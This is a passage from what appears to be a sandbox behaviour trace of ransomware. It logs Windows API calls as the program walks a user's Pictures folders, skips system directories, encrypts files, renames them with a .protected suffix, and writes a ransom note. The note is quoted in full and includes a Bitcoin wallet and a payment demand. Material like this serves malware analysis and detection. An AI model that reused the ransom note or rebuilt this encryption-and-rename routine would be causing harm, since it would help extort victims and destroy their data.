SetFilePointerEx (in: 
hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.409] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.410] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.410] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.410] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.410] CloseHandle (hObject=0xd4) returned 1 [0092.410] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png.protected") returned 94 [0092.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\t8oqs4wpdm0-igy_9.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\t8oqs4wpdm0-igy_9.png.protected")) returned 1 [0092.411] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.411] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.411] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\RESTORE_FILES.txt") returned 80 [0092.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.476] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.476] WriteFile (in: hFile=0xb4, 
lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.476] lstrlenA (lpString="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") returned 684 [0092.476] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.476] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.476] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.476] CloseHandle (hObject=0xb4) returned 1 [0092.477] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.477] lstrcmpiW (lpString1="haXR6MDt6plek1a.png", lpString2="Windows") returned -1 [0092.477] lstrcmpiW (lpString1="haXR6MDt6plek1a.png", lpString2="Program Files") returned -1 [0092.477] lstrcmpiW (lpString1="haXR6MDt6plek1a.png", lpString2="Program Files (x86)") returned -1 [0092.477] lstrcmpiW (lpString1="haXR6MDt6plek1a.png", lpString2="$Recycle.bin") returned 1 [0092.477] lstrcmpiW (lpString1="haXR6MDt6plek1a.png", lpString2="System Volume Information") returned -1 [0092.477] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png") returned 62 [0092.477] StrStrIW (lpFirst="haXR6MDt6plek1a.png", lpSrch=".protected") returned 0x0 [0092.477] lstrcmpW (lpString1="haXR6MDt6plek1a.png", lpString2="RESTORE_FILES.txt") returned 
-1 [0092.477] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.477] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\haxr6mdt6plek1a.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.478] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png") returned 62 [0092.478] StrStrW (lpFirst="haXR6MDt6plek1a.png", lpSrch=".txt") returned 0x0 [0092.478] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png") returned 62 [0092.478] StrStrW (lpFirst="haXR6MDt6plek1a.png", lpSrch=".rar") returned 0x0 [0092.478] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png") returned 62 [0092.478] StrStrW (lpFirst="haXR6MDt6plek1a.png", lpSrch=".zip") returned 0x0 [0092.478] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.479] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.479] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.479] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0092.479] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.480] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.480] CloseHandle (hObject=0xb4) returned 1 [0092.480] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png.protected") returned 72 [0092.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\haxr6mdt6plek1a.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\haxr6mdt6plek1a.png.protected")) returned 1 [0092.482] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.482] lstrcmpiW (lpString1="o s0", lpString2="Windows") returned -1 [0092.482] lstrcmpiW (lpString1="o s0", lpString2="Program Files") returned -1 [0092.482] lstrcmpiW (lpString1="o s0", lpString2="Program Files (x86)") returned -1 [0092.482] lstrcmpiW (lpString1="o s0", lpString2="$Recycle.bin") returned 1 [0092.482] lstrcmpiW (lpString1="o s0", lpString2="System Volume Information") returned -1 [0092.482] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0") returned 47 [0092.482] lstrcmpW (lpString1="o s0", lpString2=".") returned 1 [0092.482] lstrcmpW (lpString1="o s0", lpString2="..") returned 1 [0092.482] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\*") returned 49 [0092.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.482] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.482] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.482] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.482] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.482] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.482] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\.") returned 49 [0092.482] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.482] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.482] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.482] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.482] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.482] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.482] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.482] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\..") returned 50 [0092.482] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.482] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.482] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.482] lstrcmpiW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="Windows") returned -1 [0092.482] lstrcmpiW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="Program Files") 
returned -1 [0092.483] lstrcmpiW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="Program Files (x86)") returned -1 [0092.483] lstrcmpiW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="$Recycle.bin") returned 1 [0092.483] lstrcmpiW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="System Volume Information") returned -1 [0092.483] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu") returned 67 [0092.483] lstrcmpW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2=".") returned 1 [0092.483] lstrcmpW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="..") returned 1 [0092.483] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\*") returned 69 [0092.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.483] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.483] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.483] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.483] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.483] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.483] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\.") returned 69 [0092.483] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.483] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.483] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.483] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.483] lstrcmpiW (lpString1="..", lpString2="Program 
Files (x86)") returned -1 [0092.483] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.483] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.483] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\..") returned 70 [0092.484] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.484] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.484] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.484] lstrcmpiW (lpString1="9Qlywkuw.jpg", lpString2="Windows") returned -1 [0092.484] lstrcmpiW (lpString1="9Qlywkuw.jpg", lpString2="Program Files") returned -1 [0092.484] lstrcmpiW (lpString1="9Qlywkuw.jpg", lpString2="Program Files (x86)") returned -1 [0092.484] lstrcmpiW (lpString1="9Qlywkuw.jpg", lpString2="$Recycle.bin") returned 1 [0092.484] lstrcmpiW (lpString1="9Qlywkuw.jpg", lpString2="System Volume Information") returned -1 [0092.484] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg") returned 80 [0092.484] StrStrIW (lpFirst="9Qlywkuw.jpg", lpSrch=".protected") returned 0x0 [0092.484] lstrcmpW (lpString1="9Qlywkuw.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0092.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\9qlywkuw.jpg"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg") returned 80 [0092.484] StrStrW (lpFirst="9Qlywkuw.jpg", lpSrch=".txt") returned 0x0 [0092.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg") returned 80 [0092.484] StrStrW (lpFirst="9Qlywkuw.jpg", lpSrch=".rar") returned 0x0 [0092.485] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg") returned 80 [0092.485] StrStrW (lpFirst="9Qlywkuw.jpg", lpSrch=".zip") returned 0x0 [0092.485] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.485] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.485] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.485] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.485] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.486] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, 
lpOverlapped=0x0) returned 1 [0092.486] CloseHandle (hObject=0xd8) returned 1 [0092.486] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg.protected") returned 90 [0092.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\9qlywkuw.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\9qlywkuw.jpg.protected")) returned 1 [0092.487] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.487] lstrcmpiW (lpString1="Etp3ls3RUWidM", lpString2="Windows") returned -1 [0092.487] lstrcmpiW (lpString1="Etp3ls3RUWidM", lpString2="Program Files") returned -1 [0092.487] lstrcmpiW (lpString1="Etp3ls3RUWidM", lpString2="Program Files (x86)") returned -1 [0092.487] lstrcmpiW (lpString1="Etp3ls3RUWidM", lpString2="$Recycle.bin") returned 1 [0092.487] lstrcmpiW (lpString1="Etp3ls3RUWidM", lpString2="System Volume Information") returned -1 [0092.487] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM") returned 81 [0092.487] lstrcmpW (lpString1="Etp3ls3RUWidM", lpString2=".") returned 1 [0092.487] lstrcmpW (lpString1="Etp3ls3RUWidM", lpString2="..") returned 1 [0092.487] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\*") returned 83 [0092.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o 
s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0092.487] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.487] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.487] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.487] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.487] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.487] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\.") returned 83 [0092.487] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.487] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.487] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.487] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.487] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.487] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.487] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.487] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\..") returned 84 [0092.488] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.488] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.488] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.488] lstrcmpiW (lpString1="SvNJn mZsPv.jpg", lpString2="Windows") returned -1 [0092.488] lstrcmpiW (lpString1="SvNJn mZsPv.jpg", lpString2="Program Files") returned 1 [0092.488] lstrcmpiW (lpString1="SvNJn mZsPv.jpg", lpString2="Program Files (x86)") returned 
1 [0092.488] lstrcmpiW (lpString1="SvNJn mZsPv.jpg", lpString2="$Recycle.bin") returned 1 [0092.488] lstrcmpiW (lpString1="SvNJn mZsPv.jpg", lpString2="System Volume Information") returned -1 [0092.488] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg") returned 97 [0092.488] StrStrIW (lpFirst="SvNJn mZsPv.jpg", lpSrch=".protected") returned 0x0 [0092.488] lstrcmpW (lpString1="SvNJn mZsPv.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0092.488] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.488] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\etp3ls3ruwidm\\svnjn mzspv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg") returned 97 [0092.488] StrStrW (lpFirst="SvNJn mZsPv.jpg", lpSrch=".txt") returned 0x0 [0092.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg") returned 97 [0092.488] StrStrW (lpFirst="SvNJn mZsPv.jpg", lpSrch=".rar") returned 0x0 [0092.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg") returned 97 [0092.488] StrStrW (lpFirst="SvNJn mZsPv.jpg", lpSrch=".zip") returned 
